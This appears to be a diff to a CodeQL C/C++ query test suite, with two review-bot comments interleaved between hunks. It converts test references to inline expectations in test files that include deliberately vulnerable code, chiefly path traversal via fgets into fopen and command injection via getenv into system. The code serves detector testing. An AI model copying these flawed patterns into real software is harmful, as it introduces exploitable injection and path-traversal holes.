--- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/MistypedFunctionArguments.qlref
+++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/MistypedFunctionArguments.qlref
@@ -1 +1,2 @@
-Likely Bugs/Underspecified Functions/MistypedFunctionArguments.ql
+query: Likely Bugs/Underspecified Functions/MistypedFunctionArguments.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooFewArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooFewArguments.qlref
index 710092c54d85..c0c3166e8d55 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooFewArguments.qlref
+++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooFewArguments.qlref
@@ -1 +1,2 @@
-Likely Bugs/Underspecified Functions/TooFewArguments.ql
+query: Likely Bugs/Underspecified Functions/TooFewArguments.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooManyArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooManyArguments.qlref
index ca44af39c2bf..c78a44facd11 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooManyArguments.qlref
+++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooManyArguments.qlref
@@ -1 +1,2 @@
-Likely Bugs/Underspecified Functions/TooManyArguments.ql
+query: Likely Bugs/Underspecified Functions/TooManyArguments.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/test.c b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/test.c
index d77c16683ed6..a33a09acda62 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/test.c
+++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/test.c
@@ -25,52 +25,52 @@ void test(int *argv[]) { declared_void(); // GOOD declared_with(1); // GOOD - undeclared(); // BAD (GOOD for everything except cpp/implicit-function-declaration) + undeclared(); // BAD (GOOD for everything except cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] undeclared(1); // GOOD - not_yet_declared1(1); // BAD (GOOD for everything except for cpp/implicit-function-declaration) - not_yet_declared2(1); // BAD (GOOD for everything except for cpp/implicit-function-declaration) - not_yet_declared2(ca); // BAD (GOOD for everything except for cpp/mistyped-function-arguments + not_yet_declared1(1); // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] + not_yet_declared2(1); // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] + not_yet_declared2(ca); // BAD (GOOD for everything except for cpp/mistyped-function-arguments // $ Alert[cpp/mistyped-function-arguments] // and cpp/too-few-arguments. Not detected in the case of cpp/too-few-arguments.) 
not_yet_declared2(); // BAD [NOT DETECTED] (GOOD for everything except for cpp/too-few-arguments) - declared_empty_defined_with(); // BAD + declared_empty_defined_with(); // BAD // $ Alert[cpp/too-few-arguments] declared_empty_defined_with(1); // GOOD int x; - declared_empty_defined_with(&x); // BAD - declared_empty_defined_with(3, &x); // BAD + declared_empty_defined_with(&x); // BAD // $ Alert[cpp/mistyped-function-arguments] + declared_empty_defined_with(3, &x); // BAD // $ Alert[cpp/futile-params] - not_declared_defined_with(-1, 0, 2U); // BAD (GOOD for everything except for cpp/implicit-function-declaration) - not_declared_defined_with(4LL, 0, 2.5e9f); // BAD + not_declared_defined_with(-1, 0, 2U); // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] + not_declared_defined_with(4LL, 0, 2.5e9f); // BAD // $ Alert[cpp/mistyped-function-arguments] declared_with_pointers(pv, ca); // GOOD - declared_with_pointers(3.5e15, 0); // BAD + declared_with_pointers(3.5e15, 0); // BAD // $ Alert[cpp/mistyped-function-arguments] declared_with_array("Hello"); // GOOD - declared_with_array(&x); // BAD + declared_with_array(&x); // BAD // $ Alert[cpp/mistyped-function-arguments] - defined_with_float(2.f); // BAD - defined_with_float(2.0); // BAD + defined_with_float(2.f); // BAD // $ Alert[cpp/mistyped-function-arguments] + defined_with_float(2.0); // BAD // $ Alert[cpp/mistyped-function-arguments] - defined_with_double(2.f); // BAD (GOOD for everything except for cpp/implicit-function-declaration) - defined_with_double('c'); // BAD + defined_with_double(2.f); // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] + defined_with_double('c'); // BAD // $ Alert[cpp/mistyped-function-arguments] - defined_with_long_long('c'); // BAD - defined_with_long_long(3); // BAD + defined_with_long_long('c'); // BAD // $ Alert[cpp/mistyped-function-arguments] + 
defined_with_long_long(3); // BAD // $ Alert[cpp/mistyped-function-arguments] - defined_with_double(2LL); // BAD - defined_with_long_long(3.5e15); // BAD + defined_with_double(2LL); // BAD // $ Alert[cpp/mistyped-function-arguments] + defined_with_long_long(3.5e15); // BAD // $ Alert[cpp/mistyped-function-arguments] k_and_r_func(2.5, &s); // GOOD int (*parameterName)[2]; - defined_with_ptr_ptr(parameterName); // // BAD (GOOD for everything except for cpp/implicit-function-declaration) + defined_with_ptr_ptr(parameterName); // // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] defined_with_ptr_ptr(argv); // GOOD - defined_with_ptr_arr(parameterName); // // BAD (GOOD for everything except for cpp/implicit-function-declaration) + defined_with_ptr_arr(parameterName); // // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] defined_with_ptr_arr(argv); // GOOD declared_and_defined_empty(); // GOOD - declared_and_defined_empty(1); // BAD + declared_and_defined_empty(1); // BAD // $ Alert[cpp/futile-params] } void not_yet_declared1(); @@ -85,7 +85,7 @@ void not_declared_defined_with(int x, int y, int z) { int dereference(); int caller(void) { - return dereference(); // BAD + return dereference(); // BAD // $ Alert[cpp/too-few-arguments] } int dereference(int *x) { return *x; } @@ -130,8 +130,8 @@ extern int extern_definition(double, double*); void test_implicit_function_declaration(int x, double d) { int y; - implicit_declaration(1, 2); // BAD - implicit_declaration_k_and_r(1, 2); // BAD + implicit_declaration(1, 2); // BAD // $ Alert[cpp/implicit-function-declaration] + implicit_declaration_k_and_r(1, 2); // BAD // $ Alert[cpp/implicit-function-declaration] implicit_declaration(1, 2); // GOOD (no longer an implicit declaration) 
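Review bot: In the first hunk of `Underspecified Functions/test.c`, the call `not_yet_declared2();` is still commented `BAD [NOT DETECTED]` but carries no inline expectation, so the known miss stays recorded only in prose. Adding `// $ MISSING: Alert[cpp/too-few-arguments]` would make it checked, and the same applies to the `cpp/too-few-arguments` miss that the comment on `not_yet_declared2(ca);` describes. On that `not_yet_declared2(ca);` line the `// $ Alert[cpp/mistyped-function-arguments]` marker is appended in the middle of a two-line comment, before the continuation line that closes the parenthesis. The explanation is easier to follow if the parenthetical is closed on one line ahead of the marker. `test()` begins above the hunk.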
diff --git a/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/UseInOwnInitializer.qlref b/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/UseInOwnInitializer.qlref index 8242a3a6403b..f4ba94dd082f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/UseInOwnInitializer.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/UseInOwnInitializer.qlref @@ -1 +1,2 @@ -Likely Bugs/UseInOwnInitializer.ql +query: Likely Bugs/UseInOwnInitializer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/test.cpp index 41dde27c5a09..dc5cbb9c49a4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/test.cpp @@ -1,11 +1,11 @@ typedef long size_t; void test1() { - int x = x; // BAD + int x = x; // BAD // $ Alert } void test2() { - int x = x = 2; // BAD + int x = x = 2; // BAD // $ Alert } void test3() { @@ -54,11 +54,11 @@ void test9() { } void test10() { - int x = x + 1; // BAD: x is evaluated on the right hand side + int x = x + 1; // BAD: x is evaluated on the right hand side // $ Alert } void test11() { - int x = uninitialized(x) + 1; // BAD: x is evaluated on the right hand side + int x = uninitialized(x) + 1; // BAD: x is evaluated on the right hand side // $ Alert } #define self_initialize(t, x) t x = x diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfCode.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfCode.qlref index 2297839a1bf3..ffc998288f1f 100644 --- a/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfCode.qlref +++ b/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfCode.qlref @@ -1 +1 @@ -Metrics/Functions/FunLinesOfCode.ql +query: Metrics/Functions/FunLinesOfCode.ql 
diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfComments.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfComments.qlref
index 22982899aad4..0a15219eae1e 100644
--- a/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfComments.qlref
+++ b/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfComments.qlref
@@ -1 +1 @@
-Metrics/Functions/FunLinesOfComments.ql
+query: Metrics/Functions/FunLinesOfComments.ql
diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfCalls.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfCalls.qlref
index d3d6f76ce70f..32203bddc4de 100644
--- a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfCalls.qlref
+++ b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfCalls.qlref
@@ -1 +1 @@
-Metrics/Functions/FunNumberOfCalls.ql
+query: Metrics/Functions/FunNumberOfCalls.ql
diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfParameters.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfParameters.qlref
index 26fc860b76da..3601ca985073 100644
--- a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfParameters.qlref
+++ b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfParameters.qlref
@@ -1 +1 @@
-Metrics/Functions/FunNumberOfParameters.ql
+query: Metrics/Functions/FunNumberOfParameters.ql
diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfStatements.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfStatements.qlref
index 78f61924a025..ad24a29dddf1 100644
--- a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfStatements.qlref
+++ b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfStatements.qlref
@@ -1 +1 @@
-Metrics/Functions/FunNumberOfStatements.ql
+query: Metrics/Functions/FunNumberOfStatements.ql
diff --git a/cpp/ql/test/query-tests/Power of 10/Rule 2/BoundedLoopIterations.qlref b/cpp/ql/test/query-tests/Power of 10/Rule 2/BoundedLoopIterations.qlref
index bd3a3b016916..28e3197a8f70 100644
--- a/cpp/ql/test/query-tests/Power of 10/Rule 2/BoundedLoopIterations.qlref
+++ b/cpp/ql/test/query-tests/Power of 10/Rule 2/BoundedLoopIterations.qlref
@@ -1 +1,2 @@
-Power of 10/Rule 2/BoundedLoopIterations.ql
+query: Power of 10/Rule 2/BoundedLoopIterations.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Power of 10/Rule 2/loops.cpp b/cpp/ql/test/query-tests/Power of 10/Rule 2/loops.cpp
index 29ca9fa1ccda..7d2564f955e4 100644
--- a/cpp/ql/test/query-tests/Power of 10/Rule 2/loops.cpp
+++ b/cpp/ql/test/query-tests/Power of 10/Rule 2/loops.cpp
@@ -21,20 +21,20 @@ void f() { while (i < bound) { i++; } // Good: Bound not modified in loop. do { i++; } while (i < bound); // Good: Bound not modified in loop. - for (i = 0; i < 10; i--); // Bad: No increment. - while (i < 10) { } // Bad: No increment. - do { i += 2; } while (i > 10); // Bad: No decrement. - while (i > 10) { if (i < 5) i--; } // Bad: Conditional decrement. - while (i < bound) { i++; bound++; } // Bad: Bound modified in loop. - while (i < bound) { i++; bound >>= 1; } // Bad: Bound modified in loop. - while (i > bound) { i--; bound += 1; } // Bad: Bound modified in loop. - while (i > bound) { i--; bound = bound; } // Bad: Bound modified in loop. - for (; xs->next; xs = xs->next); // Bad: No bound. - while (i <= -i) {} // Bad: Hidden infinite loop. + for (i = 0; i < 10; i--); // Bad: No increment. // $ Alert + while (i < 10) { } // Bad: No increment. // $ Alert + do { i += 2; } while (i > 10); // Bad: No decrement. // $ Alert + while (i > 10) { if (i < 5) i--; } // Bad: Conditional decrement. // $ Alert + while (i < bound) { i++; bound++; } // Bad: Bound modified in loop. // $ Alert + while (i < bound) { i++; bound >>= 1; } // Bad: Bound modified in loop. // $ Alert + while (i > bound) { i--; bound += 1; } // Bad: Bound modified in loop. // $ Alert + while (i > bound) { i--; bound = bound; } // Bad: Bound modified in loop. // $ Alert + for (; xs->next; xs = xs->next); // Bad: No bound. // $ Alert + while (i <= -i) {} // Bad: Hidden infinite loop. // $ Alert while (i < 10) { i = i + 1; } // Good: Fixed bound. while (i > 10) { i = i - 1; } // Good: Fixed bound. 
- while (i < 10) { i = 0; } // Bad: increment outside loop - while (i > 10) { i = 0; } // Bad: decrement outside loop - while (i > 10) { i = 1 - i; } // Bad: Swapped operands to `-` + while (i < 10) { i = 0; } // Bad: increment outside loop // $ Alert + while (i > 10) { i = 0; } // Bad: decrement outside loop // $ Alert + while (i > 10) { i = 1 - i; } // Bad: Swapped operands to `-` // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-014/MemsetMayBeDeleted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-014/MemsetMayBeDeleted.qlref index e81526fe6d9d..bc89bc58f77a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-014/MemsetMayBeDeleted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-014/MemsetMayBeDeleted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-014/MemsetMayBeDeleted.ql +query: Security/CWE/CWE-014/MemsetMayBeDeleted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-014/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-014/test.cpp index 1e0ed7d70f00..d859a263780d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-014/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-014/test.cpp @@ -45,7 +45,7 @@ char *func2(char buff[128], unsigned long long sz) { void func3(unsigned long long sz) { char buff[128]; gets(buff); - memset(buff, 0, PW_SIZE); // BAD + memset(buff, 0, PW_SIZE); // BAD // $ Alert } // x86-64 gcc 9.2: deleted @@ -76,7 +76,7 @@ void func5(unsigned long long sz) { void func6(unsigned long long sz) { struct mem m; gets(m.b); - memset(&m, 0, PW_SIZE); // BAD + memset(&m, 0, PW_SIZE); // BAD // $ Alert } // x86-64 gcc 9.2: deleted @@ -205,7 +205,7 @@ void badFunc0_0(){ for(int i = 0; i < PW_SIZE; i++) { buff1[i] = 13; } - memset(buff1, 0, PW_SIZE); // BAD + memset(buff1, 0, PW_SIZE); // BAD // $ Alert } void nobadFunc1_0() { 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp index 876584c51174..e0ad12c94688 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp @@ -52,7 +52,7 @@ void bad() if (FILENAME_MAX-dataLen > 1) { /* POTENTIAL FLAW: Read data from the console */ - if (fgets(data+dataLen, (int)(FILENAME_MAX-dataLen), stdin) != NULL) + if (fgets(data+dataLen, (int)(FILENAME_MAX-dataLen), stdin) != NULL) // $ Source { /* The next few lines remove the carriage return from the string that is * inserted by fgets() */ @@ -74,7 +74,7 @@ void bad() { FILE *pFile = NULL; /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */ - pFile = FOPEN(data, "wb+"); + pFile = FOPEN(data, "wb+"); // $ Alert if (pFile != NULL) { fclose(pFile); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected index 031804b92251..8ebb959ae4b5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected 
@@ -1,3 +1,5 @@ +#select +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | data | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | This argument to a file access function is derived from $@ and then passed to fopen(filename). | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | user input (string read by fgets) | edges | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:62:25:62:46 | ... = ... | provenance | | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | provenance | | @@ -10,5 +12,3 @@ nodes | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | semmle.label | ... = ... | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | semmle.label | *data | subpaths -#select -| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | data | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | This argument to a file access function is derived from $@ and then passed to fopen(filename). | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | user input (string read by fgets) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.qlref index 1677939387da..399ff4f1909f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.qlref 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-022/TaintedPath.ql \ No newline at end of file +query: Security/CWE/CWE-022/TaintedPath.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected index bb1caa71e120..784928db0533 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected @@ -1,3 +1,5 @@ +#select +| tests.cpp:53:16:53:19 | data | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:53:16:53:19 | *data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | tests.cpp:33:34:33:39 | *call to getenv | user input (an environment variable) | tests.cpp:38:25:38:36 | strncat output argument | strncat output argument | edges | tests.cpp:26:15:26:23 | **badSource | tests.cpp:51:12:51:20 | *call to badSource | provenance | | | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:33:34:33:39 | *call to getenv | provenance | | @@ -18,5 +20,3 @@ nodes | tests.cpp:51:12:51:20 | *call to badSource | semmle.label | *call to badSource | | tests.cpp:53:16:53:19 | *data | semmle.label | *data | subpaths -#select -| tests.cpp:53:16:53:19 | data | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:53:16:53:19 | *data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | tests.cpp:33:34:33:39 | *call to getenv | user input (an environment variable) | tests.cpp:38:25:38:36 | strncat output argument | strncat output argument | 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.qlref index 9fe2347270f2..4e996a47ad54 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-078/ExecTainted.ql \ No newline at end of file +query: Security/CWE/CWE-078/ExecTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/tests.cpp index 80f8221d9033..c8918ffc45e2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/tests.cpp @@ -30,7 +30,7 @@ static char * badSource(char * data) { /* Append input from an environment variable to data */ size_t dataLen = strlen(data); - char * environment = GETENV(ENV_VARIABLE); + char * environment = GETENV(ENV_VARIABLE); // $ Source /* If there is data in the environment variable */ if (environment != NULL) { @@ -50,7 +50,7 @@ void CWE78_OS_Command_Injection__char_environment_system_21_bad() badStatic = 1; /* true */ data = badSource(data); /* POTENTIAL FLAW: Execute command in data possibly leading to command injection [NOT DETECTED] */ - if (SYSTEM(data) != 0) + if (SYSTEM(data) != 0) // $ Alert { printLine("command execution failed!"); exit(1); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected index 18dd45752ccb..24f63e6cfaa5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected 
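Review bot: In the second hunk of `SAMATE/ExecTainted/tests.cpp`, the comment directly above `if (SYSTEM(data) != 0) // $ Alert` still ends with `[NOT DETECTED]`. That contradicts the new inline expectation and the `#select` row for `tests.cpp:53` in `ExecTainted.expected`. A reader triaging command-injection coverage from the comments would conclude that this getenv-to-system flow is a known gap when the test now asserts it is reported. Drop the stale tag so the comment reads `/* POTENTIAL FLAW: Execute command in data possibly leading to command injection */`. The enclosing function starts and ends outside the hunk.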
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected 
@@ -1,3 +1,28 @@ +#select +| test.cpp:23:12:23:19 | command1 | test.cpp:15:27:15:30 | **argv | test.cpp:23:12:23:19 | *command1 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:15:27:15:30 | **argv | user input (a command-line argument) | test.cpp:22:13:22:20 | sprintf output argument | sprintf output argument | +| test.cpp:51:10:51:16 | command | test.cpp:47:21:47:26 | *call to getenv | test.cpp:51:10:51:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:47:21:47:26 | *call to getenv | user input (an environment variable) | test.cpp:50:11:50:17 | sprintf output argument | sprintf output argument | +| test.cpp:66:10:66:16 | command | test.cpp:63:9:63:16 | fread output argument | test.cpp:66:10:66:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:63:9:63:16 | fread output argument | user input (string read by fread) | test.cpp:65:11:65:17 | strncat output argument | strncat output argument | +| test.cpp:86:32:86:38 | command | test.cpp:83:9:83:16 | fread output argument | test.cpp:86:32:86:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:83:9:83:16 | fread output argument | user input (string read by fread) | test.cpp:85:11:85:17 | strncat output argument | strncat output argument | +| test.cpp:95:45:95:48 | path | test.cpp:92:9:92:16 | fread output argument | test.cpp:95:45:95:48 | *path | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. 
| test.cpp:92:9:92:16 | fread output argument | user input (string read by fread) | test.cpp:94:11:94:14 | strncat output argument | strncat output argument | +| test.cpp:109:18:109:22 | call to c_str | test.cpp:107:20:107:38 | *call to getenv | test.cpp:109:18:109:22 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:107:20:107:38 | *call to getenv | user input (an environment variable) | test.cpp:108:31:108:31 | call to operator+ | call to operator+ | +| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:10:115:23 | call to operator+ | call to operator+ | +| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:17:115:17 | call to operator+ | call to operator+ | +| test.cpp:121:25:121:28 | call to data | test.cpp:120:20:120:38 | *call to getenv | test.cpp:121:10:121:30 | *call to data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:120:20:120:38 | *call to getenv | user input (an environment variable) | test.cpp:121:17:121:17 | call to operator+ | call to operator+ | +| test.cpp:144:10:144:16 | command | test.cpp:141:9:141:11 | fread output argument | test.cpp:144:10:144:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:141:9:141:11 | fread output argument | user input (string read by fread) | test.cpp:143:11:143:17 | sprintf output argument | sprintf output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:178:13:178:17 | strncat output argument | strncat output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:179:13:179:19 | strncat output argument | strncat output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:181:13:181:19 | strncat output argument | strncat output argument | +| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:188:11:188:15 | strncat output argument | strncat output argument | +| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. 
| test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:189:11:189:17 | strncat output argument | strncat output argument | +| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | +| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | +| test.cpp:234:10:234:15 | buffer | test.cpp:231:19:231:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:231:19:231:33 | *call to getenv | user input (an environment variable) | test.cpp:231:11:231:16 | strncat output argument | strncat output argument | +| test.cpp:234:10:234:15 | buffer | test.cpp:232:19:232:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:232:19:232:33 | *call to getenv | user input (an environment variable) | 